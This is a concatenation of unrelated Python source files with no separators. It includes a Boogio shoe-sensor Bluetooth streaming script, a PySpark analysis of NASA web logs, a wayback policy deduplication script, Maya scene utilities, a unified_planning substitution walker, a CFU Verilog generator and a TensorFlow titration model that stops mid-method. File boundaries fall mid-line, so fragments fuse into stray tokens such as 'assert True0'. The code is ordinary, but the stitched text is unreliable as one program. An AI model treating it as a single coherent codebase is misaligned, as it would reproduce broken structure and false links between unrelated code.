"ffff04": device_is_left_shoe = True print("Device is Right Shoe") else: print("DEVICE NOT RECOGNIZED!") for svc in boogioPeripheral.services: print(" ") print(str(svc)) if svc.uuid == "f3641400-00B0-4240-ba50-05ca45bf8abc": boogioShoeSensorService = boogioPeripheral.getServiceByUUID(svc.uuid) for characteristic in boogioShoeSensorService.getCharacteristics(): print(characteristic) if characteristic.uuid == "f3641402-00B0-4240-ba50-05ca45bf8abc": buffer1Characteristic = characteristic boogioDelegate.buffer1CharacteristicHandle = characteristic.getHandle() buffer1CCCD = characteristic.getDescriptors(forUUID=CCCD_UUID)[0] buffer1CCCD.write(b"\x01\x00", True) setSampleRateByteString = bytearray() setSampleRateByteString.append(0x04) # set sample rate command setSampleRateByteString.append(0x05) # frequency argument (Hz) 
buffer1Characteristic.write(setSampleRateByteString, withResponse = True) current_time = int(round(time.time() * 1000)) byteString = bytearray() byteString.append(0x00) #set time command byteString.append((current_time >> 56) & 0xff) byteString.append((current_time >> 48) & 0xff) byteString.append((current_time >> 40) & 0xff) byteString.append((current_time >> 32) & 0xff) byteString.append((current_time >> 24) & 0xff) byteString.append((current_time >> 16) & 0xff) byteString.append((current_time >> 8) & 0xff) byteString.append((current_time >> 0) & 0xff) time.sleep(1) reload(sys) #sys.setdefaultencoding('utf8') # upate timestamp print("Timestamp = " + str(current_time)) #boogioPeripheral.writeCharacteristic(forceCharacteristicHandle, byteString, True) buffer1Characteristic.write(byteString, withResponse = True) #pygame graphics pygame.init() SCREEN_WIDTH = 640 SCREEN_HEIGHT = 400 READING_SCALE = 100 WINDOW_RESOLUTION = (SCREEN_WIDTH, SCREEN_HEIGHT) DISPLAYSURF = pygame.display.set_mode(WINDOW_RESOLUTION, pygame.DOUBLEBUF | pygame.HWSURFACE, 32) pygame.display.set_caption("Boogio 6 Data Streaming Example") metricsFont = pygame.font.SysFont("comicsans", 24) BLACK = (0,0,0) RED = (255,60,120) GREEN = (58,255,118) BLUE = (64,128,255) ORANGE = (252, 97, 38) YELLOW = (255, 255, 15) if TRANSMISSION_PORT > 0: # create a socket object serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # get local machine name host = '' # bind to the port serversocket.bind((host, TRANSMISSION_PORT)) print("Waiting for tcp socket connection over port " + str(TRANSMISSION_PORT) + "...") # queue up to 5 requests serversocket.listen(5) clientsocket, addr = serversocket.accept() shouldQuit = False while not shouldQuit: for event in pygame.event.get(): if event.type == QUIT: shouldQuit = True elif event.type == KEYDOWN: if event.key == K_ESCAPE: shouldQuit = True boogioPeripheral.waitForNotifications(0) accelerationX = str(round(boogioDelegate.accelerationX, 2)) accelerationY = str(round(boogioDelegate.accelerationY, 2)) accelerationZ = str(round(boogioDelegate.accelerationZ, 2)) rotationX = str(round(boogioDelegate.rotationX, 2)) rotationY = str(round(boogioDelegate.rotationY, 2)) rotationZ = str(round(boogioDelegate.rotationZ, 2)) rotationW = str(round(boogioDelegate.rotationW, 2)) force012String = str(round(boogioDelegate.force012, 2)) force34String = str(round(boogioDelegate.force34, 2)) force567String = str(round(boogioDelegate.force567, 2)) if headless == True: header = "" if device_is_left_shoe: header = header + "ls" elif device_is_right_shoe: header = header + "rs" header = header + "bl" message = header + " " + accelerationX + " " + accelerationY + " " + accelerationZ + " " \ + rotationX + " " + rotationY + " " + rotationZ + " " + rotationW + " " \ + force012String + " " + force34String + " " + force567String print(message) if TRANSMISSION_PORT > 0: try: clientsocket.send(message.encode('ascii')) except (BrokenPipeError): shouldQuit = True else: hSpacing = 13 vSpacing = 24 cursorX = hSpacing cursorY = vSpacing #labels DISPLAYSURF.fill(BLACK) labelSurface = metricsFont.render("Peripheral: ", 1, (255,255,255)) DISPLAYSURF.blit(labelSurface, (cursorX, vSpacing)) labelSurface = metricsFont.render("Acceleration ", 1, (255,255,255)) DISPLAYSURF.blit(labelSurface, (cursorX, vSpacing * 3)) labelSurface = metricsFont.render("[Gravities*1000]:", 1, (255,255,255)) DISPLAYSURF.blit(labelSurface, (cursorX, vSpacing * 4)) labelSurface = metricsFont.render("Rotation ", 1, (255,255,255)) 
DISPLAYSURF.blit(labelSurface, (cursorX, vSpacing * 6)) labelSurface = metricsFont.render("[quaternion*1000]:", 1, (255,255,255)) DISPLAYSURF.blit(labelSurface, (cursorX, vSpacing * 7)) labelSurface = metricsFont.render("Force ", 1, (255,255,255)) DISPLAYSURF.blit(labelSurface, (cursorX, vSpacing * 10)) labelSurface = metricsFont.render("[ADC]:", 1, (255,255,255)) DISPLAYSURF.blit(labelSurface, (cursorX, vSpacing * 11)) # readings cursorX = SCREEN_WIDTH / 8 labelSurface = metricsFont.render(PERIPHERAL_UUID, 1, (255,255,255)) DISPLAYSURF.blit(labelSurface, (cursorX + hSpacing*8, vSpacing)) labelSurface = metricsFont.render("____________________________________________________________________", 1, (255,255,255)) DISPLAYSURF.blit(labelSurface, (hSpacing, vSpacing * 1)) labelSurface = metricsFont.render("____________________________________________________________________", 1, (255,255,255)) DISPLAYSURF.blit(labelSurface, (hSpacing, vSpacing * 2)) labelSurface = metricsFont.render("X", 1, RED) DISPLAYSURF.blit(labelSurface, (cursorX + hSpacing*8, vSpacing * 2)) labelSurface = metricsFont.render("Y", 1, GREEN) DISPLAYSURF.blit(labelSurface, (cursorX + hSpacing*16, vSpacing * 2)) labelSurface = metricsFont.render("Z", 1, BLUE) DISPLAYSURF.blit(labelSurface, (cursorX + hSpacing*24, vSpacing * 2)) labelSurface = metricsFont.render("W", 1, YELLOW) DISPLAYSURF.blit(labelSurface, (cursorX + hSpacing*32, vSpacing * 2)) labelSurface = metricsFont.render(accelerationX, 1, RED) DISPLAYSURF.blit(labelSurface, (cursorX + hSpacing*8, vSpacing * 4)) labelSurface = metricsFont.render(accelerationY, 1, GREEN) DISPLAYSURF.blit(labelSurface, (cursorX + hSpacing*16, vSpacing * 4)) labelSurface = metricsFont.render(accelerationZ, 1, BLUE) DISPLAYSURF.blit(labelSurface, (cursorX + hSpacing*24, vSpacing * 4)) labelSurface = metricsFont.render(rotationX, 1, RED) DISPLAYSURF.blit(labelSurface, (cursorX + hSpacing*8, vSpacing * 7)) labelSurface = metricsFont.render(rotationY, 1, GREEN) DISPLAYSURF.blit(labelSurface, (cursorX + hSpacing*16, vSpacing * 7)) labelSurface = metricsFont.render(rotationZ, 1, BLUE) DISPLAYSURF.blit(labelSurface, (cursorX + hSpacing*24, vSpacing * 7)) labelSurface = metricsFont.render(rotationW, 1, YELLOW) DISPLAYSURF.blit(labelSurface, (cursorX + hSpacing*32, vSpacing * 7)) labelSurface = metricsFont.render("____________________________________________________________________", 1, (255,255,255)) DISPLAYSURF.blit(labelSurface, (hSpacing, vSpacing * 8)) labelSurface = metricsFont.render("____________________________________________________________________", 1, (255,255,255)) DISPLAYSURF.blit(labelSurface, (hSpacing, vSpacing * 9)) labelSurface = metricsFont.render("(F0+F1+F2)/3", 1, ORANGE) DISPLAYSURF.blit(labelSurface, (cursorX + hSpacing*8, vSpacing * 9)) labelSurface = metricsFont.render("(F3+F4)/2", 1, ORANGE) DISPLAYSURF.blit(labelSurface, (cursorX + hSpacing*16, vSpacing * 9)) labelSurface = metricsFont.render("(F5+F6+F7)/3", 1, ORANGE) DISPLAYSURF.blit(labelSurface, (cursorX + hSpacing*24, vSpacing * 9)) labelSurface = metricsFont.render(force012String, 1, ORANGE) DISPLAYSURF.blit(labelSurface, (cursorX + hSpacing*8, vSpacing * 11)) labelSurface = metricsFont.render(force34String, 1, ORANGE) DISPLAYSURF.blit(labelSurface, (cursorX + hSpacing*16, vSpacing * 11)) labelSurface = metricsFont.render(force567String, 1, ORANGE) DISPLAYSURF.blit(labelSurface, (cursorX + hSpacing*24, vSpacing * 11)) pygame.display.update() if TRANSMISSION_PORT > 0: clientsocket.send(str("c0").encode('ascii')) 
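# Illustrative sketch of a matching TCP consumer (not part of the original script): the
# relay above sends ASCII messages of the form "header ax ay az rx ry rz rw f012 f34 f567",
# where the header is "lsbl" or "rsbl", and the literal token "c0" signals shutdown.
# The host and port defaults below are assumptions; use whatever TRANSMISSION_PORT was
# passed to this script via -p.
def example_read_boogio_stream(host="localhost", port=5000):
    import socket
    consumer = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    consumer.connect((host, port))
    try:
        while True:
            chunk = consumer.recv(1024).decode("ascii")
            if not chunk or chunk.startswith("c0"):
                break
            fields = chunk.split()
            header, readings = fields[0], [float(v) for v in fields[1:]]
            print(header, readings)
    finally:
        consumer.close()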
clientsocket.close() boogioPeripheral.disconnect() pygame.quit() if __name__ == "__main__": main() 0 """ ML_playground Playing around wiht tf, pytorch, ANI, deepchem .... """ # Add imports here from .ml_playground import * # Handle versioneer from ._version import get_versions versions = get_versions() __version__ = versions['version'] __git_revision__ = versions['full-revisionid'] del get_versions, versions """ A simple script designed to loop through policy dirs and compare all company policies to one another to determine no duplicates have been saved. Duplicates can be caused by policies generated by a legacy wayback_search.py version or simply by the wayback service pointing us to a slightly different date of an archived version of a website one time vs another. """ from wayback_search import POLICY_DIR, make_index_file_name import pandas as pd import filecmp import os def main(): company_dirs = [(os.path.join(POLICY_DIR, x), x) for x in os.listdir(POLICY_DIR) if '.csv' not in x] print(company_dirs) removed = list() for cdir, company in company_dirs: # there should only be policies in the dir but here we double-check policies = [os.path.join(cdir, x) for x in os.listdir(cdir) if '.txt' in x] print(cdir) # and now we cross compare for duplicates for i, p1 in enumerate(policies): p1_name = os.path.basename(p1) for p2 in policies[i:]: p2_name = os.path.basename(p2) if p1 == p2 or not os.path.exists(p1) or not os.path.exists(p2): continue print('{} <-> {}'.format(p1_name, p2_name)) same = filecmp.cmp(p1, p2) if same: print('same!') os.remove(p2) removed.append((company, p2_name)) print('Removed: {}'.format(removed)) # now we have to remove these entries from the index files for company, dead_policy in removed: cindex = os.path.join(POLICY_DIR, make_index_file_name(company)) df = pd.read_csv(cindex) df = df[~df.policy_path.str.contains(dead_policy)] df.to_csv(cindex, index=False) print('fixed {}'.format(cindex)) if __name__ == '__main__': main() puneet3663/Big-Data-Analytics-in-Spark-with-Python-and-SQL #!/usr/bin/env python # coding: utf-8 # In[1]: # import spark liriaries from pyspark.context import SparkContext from pyspark.sql.context import SQLContext from pyspark.sql.session import SparkSession from pyspark.sql.functions import regexp_extract from pyspark.sql.functions import col from pyspark.sql.functions import sum as spark_sum from pyspark.sql.functions import desc, row_number, monotonically_increasing_id from pyspark.sql.window import Window from pyspark.sql.functions import udf # load up other dependencies import re import glob import optparse # In[2]: sc = SparkContext() sqlContext = SQLContext(sc) spark = SparkSession(sc) # In[3]: # Download NASA_access_log_Aug95.gz file #get_ipython().system(' wget ftp://ita.ee.lbl.gov/traces/NASA_access_log_Aug95.gz') # In[4]: #insert data raw_data_files = glob.glob('*.gz') raw_data_files # In[5]: base_df = spark.read.text(raw_data_files) #base_df.printSchema() # In[6]: base_df_rdd = base_df.rdd # In[7]: sample_logs = [item['value'] for item in base_df.take(15)] # In[8]: host_pattern = r'(^\S+\.[\S+\.]+\S+)\s' hosts = [re.search(host_pattern, item).group(1) if re.search(host_pattern, item) else 'no match' for item in sample_logs] # In[9]: ts_pattern = r'\[(\d{2}/\w{3}/\d{4}:\d{2}:\d{2}:\d{2} -\d{4})]' timestamps = [re.search(ts_pattern, item).group(1) for item in sample_logs] # In[10]: method_uri_protocol_pattern = r'\"(\S+)\s(\S+)\s*(\S*)\"' method_uri_protocol = [re.search(method_uri_protocol_pattern, item).groups() if 
re.search(method_uri_protocol_pattern, item) else 'no match' for item in sample_logs] # In[11]: status_pattern = r'\s(\d{3})\s' status = [re.search(status_pattern, item).group(1) for item in sample_logs] # In[12]: content_size_pattern = r'\s(\d+)$' content_size = [re.search(content_size_pattern, item).group(1) for item in sample_logs] # In[13]: logs_df = base_df.select(regexp_extract('value', host_pattern, 1).alias('host'), regexp_extract('value', ts_pattern, 1).alias('timestamp'), regexp_extract('value', method_uri_protocol_pattern, 1).alias('method'), regexp_extract('value', method_uri_protocol_pattern, 2).alias('endpoint'), regexp_extract('value', method_uri_protocol_pattern, 3).alias('protocol'), regexp_extract('value', status_pattern, 1).cast('integer').alias('status'), regexp_extract('value', content_size_pattern, 1).cast('integer').alias('content_size')) #logs_df.show(10, truncate=True) #print((logs_df.count(), len(logs_df.columns))) # In[14]: df_with_seq_id = logs_df.withColumn('index', row_number().over(Window.orderBy(monotonically_increasing_id())) - 1) #df_with_seq_id.show() # In[15]: bad_rows_df = df_with_seq_id.filter(logs_df['host'].isNull()| df_with_seq_id['timestamp'].isNull() | df_with_seq_id['method'].isNull() | df_with_seq_id['endpoint'].isNull() | df_with_seq_id['status'].isNull() | df_with_seq_id['content_size'].isNull()| df_with_seq_id['protocol'].isNull()) # In[16]: def count_null(col_name): return spark_sum(col(col_name).isNull().cast('integer')).alias(col_name) # Build up a list of column expressions, one per column. exprs = [count_null(col_name) for col_name in df_with_seq_id.columns] # Run the aggregation. The *exprs converts the list of expressions into # variable function arguments. #logs_df.agg(*exprs).show() # In[17]: regexp_extract('value', r'\s(\d{3})\s', 1).cast('integer').alias( 'status') # In[18]: null_status_df = base_df.filter(~base_df['value'].rlike(r'\s(\d{3})\s')) # In[19]: bad_status_df = null_status_df.select(regexp_extract('value', host_pattern, 1).alias('host'), regexp_extract('value', ts_pattern, 1).alias('timestamp'), regexp_extract('value', method_uri_protocol_pattern, 1).alias('method'), regexp_extract('value', method_uri_protocol_pattern, 2).alias('endpoint'), regexp_extract('value', method_uri_protocol_pattern, 3).alias('protocol'), regexp_extract('value', status_pattern, 1).cast('integer').alias('status'), regexp_extract('value', content_size_pattern, 1).cast('integer').alias('content_size')) # In[20]: logs_df = df_with_seq_id[logs_df['status'].isNotNull()] exprs = [count_null(col_name) for col_name in logs_df.columns] #logs_df.agg(*exprs).show() # In[21]: regexp_extract('value', r'\s(\d+)$', 1).cast('integer').alias('content_size') # In[22]: null_content_size_df = base_df.filter(~base_df['value'].rlike(r'\s\d+$')) #null_content_size_df.count() # In[23]: logs_df = logs_df.na.fill({'content_size': 0}) exprs = [count_null(col_name) for col_name in logs_df.columns] #logs_df.agg(*exprs).show() # In[24]: #logs_df.show() # In[25]: month_map = { 'Jan': 1, 'Feb': 2, 'Mar':3, 'Apr':4, 'May':5, 'Jun':6, 'Jul':7, 'Aug':8, 'Sep': 9, 'Oct':10, 'Nov': 11, 'Dec': 12 } def parse_clf_time(text): """ Convert Common Log time format into a Python datetime object Args: text (str): date and time in Apache time format [dd/mmm/yyyy:hh:mm:ss (+/-)zzzz] Returns: a string suitable for passing to CAST('timestamp') """ # NOTE: We're ignoring the time zones here, might need to be handled depending on the problem you are solving return "{0:04d}-{1:02d}-{2:02d} 
{3:02d}:{4:02d}:{5:02d}".format( int(text[7:11]), month_map[text[3:6]], int(text[0:2]), int(text[12:14]), int(text[15:17]), int(text[18:20]) ) # In[26]: udf_parse_time = udf(parse_clf_time) logs_df = (logs_df.select('*', udf_parse_time(logs_df['timestamp']) .cast('timestamp') .alias('time')) .drop('timestamp')) # In[27]: #logs_df.show(10, truncate=True) # In[28]: #logs_df.printSchema() # In[29]: logs_df.cache() # In[30]: # Initializing SparkSession sc = SparkSession.builder.appName("PysparkExample").config ("spark.sql.shuffle.partitions", "50").config("spark.driver.maxResultSize","5g").config ("spark.sql.execution.arrow.enabled", "true").getOrCreate() # In[31]: # Registering a table logs_df.registerTempTable("data_table") # In[32]: #sc.sql("select * from data_table").show(20) # In[39]: def q1(): #print ("Top 10 requested pages and the number of requests made for each") sql = """ select endpoint as pages, count (endpoint) as requests from data_table where method = 'GET' group by endpoint order by requests desc limit 10 """ return spark.sql(sql).show() # In[ ]: # In[41]: def q2(): #print ("Percentage of successful requests (anything in the 200s and 300s range)") sql = """ select (select count(status) from data_table where status like '2%%' or status like '3%%') / (select count(status) from data_table) * 100 as Percentage_of_successful_requests """ return spark.sql(sql).show() # In[42]: def q3(): #print ("Percentage of unsuccessful requests (anything that is not in the 200s or 300s range)") sql = """ select (select count(status) from data_table where status NOT LIKE '2%%' and status NOT LIKE '3%%') / (select count(status) from data_table) * 100 as Percentage_of_successful_requests """ return spark.sql(sql).show() # In[43]: def q4(): #print ("Top 10 unsuccessful page requests") sql = """ select endpoint as pages, count (endpoint) as requests from data_table where status NOT LIKE '2%%' and status NOT LIKE '3%%' and method = 'GET' group by endpoint order by requests desc limit 10 """ return spark.sql(sql).show() # In[44]: def q5(): #print("The top 10 hosts making the most requests, displaying the IP address and number of requests made.") sql = """ select host, endpoint,count (endpoint) as requests from data_table where method = 'GET' group by endpoint, host order by requests desc limit 10 """ return spark.sql(sql).show() # In[ ]: # In[45]: #print ("Start the Parser!!!!",'\n') #import argparse# Create the parser #def fib(sql): # return spark.sql(sql).show() # Import the library #parser = argparse.ArgumentParser()# Add an argument #parser.add_argument('--sql', type=str, required=True)# Parse the argument #args = parser.parse_args() #(options, args) = parser.parse_args() #result = fib(options.sql) #def fib(sql): # return spark.sql(sql).show() def Main(): parser = optparse.OptionParser('usage'+'--q1 or --q2 or --q3 etc. 
' , version="%prog 1.0") parser.add_option('--q1', dest='q1', type='string',help='q1: Top 10 requested pages and the number of requests made for each') parser.add_option('--q2', dest='q2', type='string',help='q2: Percentage of successful requests (anything in the 200s and 300s range)') parser.add_option('--q3', dest='q3', type='string',help='q3: Percentage of unsuccessful requests (anything that is not in the 200s or 300s range)') parser.add_option('--q4', dest='q4', type='string',help='q4: Top 10 unsuccessful page requests') parser.add_option('--q5', dest='q5', type='string',help='q5: The top 10 hosts making the most requests, displaying the IP address and number of requests made.') (options, args) = parser.parse_args() if (options.q1 != None): print ('\n','q1: Top 10 requested pages and the number of requests made for each','\n') #sql = options.q1 result = q1() if (options.q2 != None): print ('\n','q2: Percentage of successful requests (anything in the 200s and 300s range)','\n') #sql = options.q2 result = q2() if (options.q3 != None): print ('\n','q3: Percentage of unsuccessful requests (anything that is not in the 200s or 300s range)','\n') #sql = options.q3 result = q3() if (options.q4 != None): print ('\n','q4: Top 10 unsuccessful page requests','\n') #sql = options.q4 result = q4() if (options.q5 != None): print ('\n','q5: The top 10 hosts making the most requests, displaying the IP address and number of requests made.','\n') #sql = options.q5 result = q5() else: print (parser.usage) exit(0) if __name__ == '__main__': Main() from __future__ import with_statement # this is to work with python2.5 from pyps import workspace from os import remove import pypips filename="partialeval03" pypips.delete_workspace(filename) with workspace(filename+".c", parents=[], deleteOnClose=False,name=filename) as w: m=w['main'] m.partial_eval() m.display() """ This example is not finished """ import numpy as np import pandas as pd from pydsge import DSGE import matplotlib.pyplot as plt from sympy import Matrix, symbols from statsmodels.tsa.filters.hp_filter import hpfilter from pydsge import FRED fred = FRED() # ===== Grab and organize Data ===== # # Get data from the FRED series_dict = {'CPIAUCSL': 'CPI', 'GDP': 'GDP', 'DFF': 'Fed Funds Rate'} df = fred.fetch(series_id=series_dict) # Observed varibles df_obs = pd.DataFrame() df_obs['CPI'] = df['CPI'].dropna().resample('Q').last().pct_change(1) * 4 df_obs['FFR'] = df['Fed Funds Rate'].resample('Q').mean() df_obs['outputgap'], _ = hpfilter(np.log(df['GDP'].resample('Q').last().dropna()), 1600) df_obs = df_obs.dropna() df_obs = df_obs[df_obs.index >= '2000-01-01'] # ================================ # ===== MODEL ESPECIFICATION ===== # ================================ # endogenous variables at t # endogenous variables at t - 1 # exogenous shocks # expectational shocks # parameters # Summary parameters # model (state) equations # observation equations # ============================= # ===== MODEL ESTIMATION ===== # ============================= # Not all parameters need to be estimated, these are going to be calibrated # priors # DSGE object # Estimation # Posterior Table # IRFs from the estimated Model # Extraxct state variables # Historical Decomposition from VASA.VASA.reduce_vasa_df import * def test_b(): assert True0 """ get list set remove/delete """ print("Import Module : {}".format(__name__)) import pymel.core as pm import maya.cmds as cmds def get_scene_name(): return pm.sceneName().namebase.__str__() def get_scene_path(): return 
pm.sceneName().abspath().__str__() def get_scene_dir(): return pm.sceneName().dirname().__str__() def get_workspace_path(): return str(pm.Workspace().path.dirname()) def delete_unknown_nodes(): """ Delete all the unknown nodes present in the scene file :return: """ print("Deleting Unknown Nodes") cmds.delete(cmds.ls(type='unknown')) def delete_unknown_plugins(): """ Delete all the unknown plugins present in the scene file :return: """ plugins_list = cmds.unknownPlugin(q=True, l=True) if plugins_list: for plugin in plugins_list: print(plugin) cmds.unknownPlugin(plugin, r=True) def list_all_plugins(status="all", info=False): """ List all plugins , with details :param status: :param info: list the info as well (version,path installed) :return: """ if status == "enabled": print("all active plugins") elif status == "disabled": print("all inactive plugins") elif status == "all": print("List all plugins") print("Improrted Scene module END. {}".format(__name__)) # Copyright 2021 AIPlan4EU project # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import unified_planning.walkers as walkers import unified_planning.environment from unified_planning.walkers.identitydag import IdentityDagWalker from unified_planning.model import FNode, OperatorKind from unified_planning.exceptions import UPTypeError from unified_planning.model import Expression from typing import List, Dict class Substituter(IdentityDagWalker): """Performs substitution into an expression """ def __init__(self, env: 'unified_planning.environment.Environment'): IdentityDagWalker.__init__(self, env, True) self.env = env self.manager = env.expression_manager self.type_checker = env.type_checker def _get_key(self, expression, **kwargs): return expression def substitute(self, expression: FNode, substitutions: Dict[Expression, Expression] = {}) -> FNode: """Performs substitution into the given expression. 
Let's consider the examples: f = a & b subs = {a -> c, (c & b) -> d, (a & b) -> c} substitute(f, subs) = c f = a subs = {a -> c, c -> d} substitute(f, subs) = c f = a & b subs = {a -> 5, b -> c} substitute(f, subs) raises an UPTypeError Note that, since subs is a dictionary: f = a subs = {a -> b, a -> c} substitute(f, subs) = c """ if len(substitutions) == 0: return expression new_substitutions: Dict[FNode, FNode] = {} for k, v in substitutions.items(): new_k, new_v = self.manager.auto_promote(k, v) if self.type_checker.is_compatible_exp(new_v, new_k): new_substitutions[new_k] = new_v else: raise UPTypeError( f"The expression type of {str(k)} is not compatible with the given substitution {str(v)}") return self.walk(expression, subs = new_substitutions) @walkers.handles(OperatorKind) def walk_replace_or_identity(self, expression: FNode, args: List[FNode], subs: Dict[FNode, FNode] = {}, **kwargs) -> FNode: res = subs.get(expression, None) if res is not None: return res else: return IdentityDagWalker.super(self, expression, args, **kwargs)
# Copyright 2021 The CFU-Playground Authors # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import os.path from nmigen import * from nmigen.back import verilog from gateware.hps_cfu import make_cfu VERILOG_FILENAME = "cfu.v" def read_file(): if os.path.exists(VERILOG_FILENAME): with open(VERILOG_FILENAME, "r") as f: return f.read() return None def main(): cfu = make_cfu() new_verilog = verilog.convert(cfu, name='Cfu', ports=cfu.ports) old_verilog = read_file() if new_verilog != old_verilog: with open(VERILOG_FILENAME, "w") as f: f.write(new_verilog) if __name__ == '__main__': main()
""" titration.py Bayesian modelling of titration volumes and concentrations """ # imports import numpy as np import tensorflow as tf tf.enable_eager_execution() import tensorflow_probability as tfp from tensorflow_probability import distributions as tfd import copy from tensorflow_probability import edward2 as ed from utils import * # @tf.contrib.eager.defun def cov(x): """ Covariance of a 2D array. $ K_{XX} = Cov(X, X) = E(X^T X) - E(X)^T E(X) $ Parameters ---------- X : tf.Tensor Returns ------- cov : the covariance matrix """ # X.shape = (n_samples, time) n_samples = x.shape[0].value xtx = tf.matmul(tf.transpose(x), x) e_xtx = tf.div(xtx, n_samples) e_x = tf.reduce_mean(x, axis=[0], keep_dims=True) et_x = tf.transpose(e_x) # note that we use this transpose form because # n_samples is at the first axis cov_ = e_xtx - tf.matmul(et_x, e_x) return cov_ class Solution: """A Solution object contains the information about the solution, i.e. species, concentrations, and so forth. Attributes ---------- concs : list or np.ndarray, shape = (3, ), concentrations of the solution d_concs : list or np.ndarray, shape = (3, ), uncertainty of concentrations of the solution """ # TODO: use this class to further record physical constants. 
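# A minimal usage sketch (hypothetical numbers; conc_p/conc_l/conc_r and their d_conc_*
# uncertainties are the constructor arguments defined below for the three tracked species):
#     stock = Solution(conc_l=0.10, d_conc_l=0.005)   # one species with its uncertainty
#     blank = Solution()                              # all-zero solution
#     stock.concs   # -> constant float32 tensor [0.0, 0.10, 0.0]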
def __init__(self, conc_p = 0, conc_l = 0, conc_r = 0, d_conc_p = 0, d_conc_l = 0, d_conc_r = 0, concs = None, d_concs = None): if concs == None: concs = [conc_p, conc_l, conc_r] if d_concs == None: d_concs = [d_conc_p, d_conc_l, d_conc_r] self.concs = tf.constant(concs, dtype=tf.float32) self.d_concs = tf.constant(d_concs, dtype=tf.float32) class Plate: """A Plate object contains all the information about the volumes, concentrations of species, as well as the covariance thereof, in a certain time series. Attributes ---------- n_wells : int number of cells in the plate. path_length : float length of the path of the cells. sampled : Boolean whether this plate is sampled or not. finished_selected_non_zero : Boolean to keep record of whether the process of select nonzero volumes are finished, to ensure that Cholesky decomposition works. ind_vols : tf.Tensor volumes of liquid in cells in each step. ind_concs : tf.Tensor concentrations of species in each step. ind_d_vols : tf.Tensor uncertainty associated with ind_vols. ind_d_concs : tf.Tensor uncertainty associated with ind_concs. """ def __init__(self, n_wells: int, path_length: float = 1.0) -> None: # generic properties of the plate self.n_wells = n_wells self.path_length = path_length # flags for status self.sampled = False self.finished_select_non_zero = False # matrices to keep track of the quantities in the plate # individual volumes at each time step # (time, n_wells) self.ind_vols = tf.zeros((1, n_wells), dtype=tf.float32) # individual concentrations at each time step # (time, 3, n_wells) self.ind_concs = tf.zeros((1, 3, n_wells), dtype=tf.float32) # uncertainty associated with ind_vols # (time, n_wells) self.ind_d_vols = tf.zeros((1, n_wells), dtype=tf.float32) # uncertainty associated with ind_concs # (time, 3, n_wells) self.ind_d_concs = tf.zeros((1, 3, n_wells), dtype=tf.float32) def inject( self, solution = None, well_idx: int = 0, vol: float = 0.0, d_vol: float = 0.0) -> None: """Models one titration, with: certain species, volume $V$, uncertainty of volume $dV$, concentration of that species $c$, uncertainty of the concentration $dc$. The values should be read from the solution; the errors are determined by uncertainty in the purity, instrument error, etc. Following things happen: 1. The expected volume of the cell increased by $V$. this is modelled by appending value $V$ at the end of volume tensor. 2. Uncertainty introduced to the volume. This is modelled by expanding another column and another row at the end of covariance matrix, and filling it with $dV$. 3. The expected concentration of the certain species becomes: $$ \frac{c_0 V_0 + cV}{V_0 + V}$$ 4. Error introduced to the concentration. This is modelled by expanding another column and another row at the end of covariance matrix, and filling it with $$ \sigma^2(c)E(\frac{V}{V + V_0})$$ Parameters ---------- solution : the solution object to be injected into the plate. 
cells : list indicies of cells vols : volumes of the injection d_vol : uncertainty associated with val """ # assert that the place of injection is within the plate assert well_idx < self.n_wells # handle ind_vols new_ind_vols = tf.Variable( tf.zeros((1, self.n_wells), dtype=tf.float32)) new_ind_vols[0, well_idx].assign(vol + new_ind_vols[0, well_idx]) self.ind_vols = tf.concat((self.ind_vols, new_ind_vols), axis=0) # handle ind_concs new_ind_concs = tf.Variable( tf.zeros((1, 3, self.n_wells), dtype=tf.float32)) new_ind_concs[0, :, well_idx].assign(solution.concs + new_ind_concs[0, :, well_idx]) self.ind_concs = tf.concat((self.ind_concs, new_ind_concs), axis=0) # handle ind_d_vols new_ind_d_vols = tf.Variable( tf.zeros((1, self.n_wells), dtype=tf.float32)) new_ind_d_vols[0, well_idx].assign(d_vol + new_ind_d_vols[0, well_idx]) self.ind_d_vols = tf.concat((self.ind_d_vols, new_ind_d_vols), axis=0) # handle ind_d_concs new_ind_d_concs = tf.Variable( tf.zeros((1, 3, self.n_wells), dtype=tf.float32)) new_ind_d_concs[0, :, well_idx].assign(solution.d_concs + new_ind_d_concs[0, :, well_idx]) self.ind_d_concs = tf.concat((self.ind_d_concs, new_ind_d_concs), axis=0) def sample(self, n_samples: int = 1) -> None: """ Sample independent volumes and concentrations and compute the cumulative volumes and concentrations. Parameters ---------- n_samples : int the number of samples """ time = self.ind_vols.shape[0].value n_wells = self.ind_vols.shape[1].value # ======== # sampling # ======== # unravel time series ind_vols_fl = tf.reshape(self.ind_vols, [-1]) ind_concs_fl = tf.reshape(self.ind_concs, [-1]) ind_d_vols_fl = tf.reshape(self.ind_d_vols, [-1]) ind_d_concs_fl = tf.reshape(self.ind_d_concs, [-1]) # put them into random variables ind_vols_fl_rv = MultivariateLogNormalDiag(ind_vols_fl, ind_d_vols_fl) ind_concs_fl_rv = MultivariateLogNormalDiag(ind_concs_fl, ind_d_concs_fl) # sample! 
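# (The per-step volumes and concentrations were flattened into single vectors above, so the
#  .sample(n_samples) calls below draw n_samples joint samples over every well and time step
#  at once from the diagonal log-normal random variables before reshaping them back.)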
